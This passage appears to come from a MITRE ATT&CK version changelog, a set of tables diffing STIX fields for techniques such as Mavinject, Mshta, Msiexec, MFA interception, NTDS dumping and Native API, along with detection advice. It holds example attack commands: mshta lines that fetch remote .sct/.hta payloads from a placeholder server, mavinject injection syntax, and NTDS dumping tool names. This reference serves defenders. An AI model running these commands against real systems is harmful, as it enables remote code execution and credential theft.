In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
| external_references[1]['source_name'] | LOLBAS Mavinject | ATT Lazarus TTP Evolution |
| external_references[1]['description'] | LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. | Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. |
| external_references[1]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ | https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution |
| external_references[2]['source_name'] | ATT Lazarus TTP Evolution | LOLBAS Mavinject |
| external_references[2]['description'] | Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. | LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution | https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ |
| external_references[3]['source_name'] | Reaqta Mavinject | Mavinject Functionality Deconstructed |
| external_references[3]['description'] | Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021. | Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://reaqta.com/2017/12/mavinject-microsoft-injector/ | https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e |
| external_references[4]['source_name'] | Mavinject Functionality Deconstructed | Reaqta Mavinject |
| external_references[4]['description'] | Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. | Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021. |
| external_references[4]['url'] | https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e | https://reaqta.com/2017/12/mavinject-microsoft-injector/ |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on macOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, and remote desktop. |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:48:33.990000+00:00 | 2022-10-18 16:28:56.126000+00:00 |
| external_references[2]['source_name'] | Dell Skeleton | Xorrior Authorization Plugins |
| external_references[2]['description'] | Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. | Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021. |
| external_references[2]['url'] | https://www.secureworks.com/research/skeleton-key-malware-analysis | https://xorrior.com/persistent-credential-theft/ |
| external_references[3]['source_name'] | Xorrior Authorization Plugins | Dell Skeleton |
| external_references[3]['description'] | Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021. | Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. |
| external_references[3]['url'] | https://xorrior.com/persistent-credential-theft/ | https://www.secureworks.com/research/skeleton-key-malware-analysis |
| external_references[4]['source_name'] | TechNet Audit Policy | dump_pwd_dcsync |
| external_references[4]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://adsecurity.org/?p=2053 |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Process: OS API Execution | User Account: User Account Modification |
| x_mitre_data_sources[2] | Process: Process Access | User Account: User Account Authentication |
| x_mitre_data_sources[3] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[5] | Module: Module Load | Logon Session: Logon Session Creation |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_detection | Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). |
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Monitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The Store passwords using reversible encryption configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of -AllowReversiblePasswordEncryption $true, Set-ADUser and Set-ADAccountControl. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
|
| x_mitre_version | 2.0 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'} | |
| x_mitre_data_sources | Application Log: Application Log Content | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Active Directory: Active Directory Object Modification | |
| x_mitre_data_sources | Process: Process Access | |
| x_mitre_platforms | Azure AD | |
| x_mitre_platforms | Google Workspace | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | SaaS | |
| Description |
|---|
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:59:00.395000+00:00 | 2022-03-11 20:38:28.802000+00:00 |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Command: Command Execution |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-07 19:57:26.824000+00:00 | 2022-04-19 17:33:16.346000+00:00 |
| description | Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
| external_references[1]['source_name'] | Microsoft msiexec | TrendMicro Msiexec Feb 2018 |
| external_references[1]['description'] | Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. | Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec | https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ |
| external_references[3]['source_name'] | TrendMicro Msiexec Feb 2018 | Microsoft msiexec |
| external_references[3]['description'] | Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. | Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. |
| external_references[3]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec |
| x_mitre_data_sources[0] | Process: Process Creation | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: Process Creation |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) | Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. 
Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 20:35:21.672000+00:00 | 2022-10-31 19:47:26.104000+00:00 |
| name | Two-Factor Authentication Interception | Multi-Factor Authentication Interception |
| description | Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) | Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. 
Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) |
| external_references[1]['source_name'] | Mandiant M Trends 2011 | GCN RSA June 2011 |
| external_references[1]['description'] | Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016. | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. |
| external_references[1]['url'] | https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf | https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ |
| external_references[2]['source_name'] | GCN RSA June 2011 | Mandiant M Trends 2011 |
| external_references[2]['description'] | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. | Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016. |
| external_references[2]['url'] | https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx | https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-14 23:08:02.782000+00:00 | 2022-03-08 21:00:52.774000+00:00 |
| description | Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. 
While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 21:24:30.764000+00:00 | 2022-04-19 20:30:00.118000+00:00 |
| description | Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directly invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) API callers can use such functions to execute a binary, run a CLI command, load modules, and so on, as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as NtCreateProcess) may be directly invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) API callers can use such functions to execute a binary, run a CLI command, load modules, and so on, as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). |
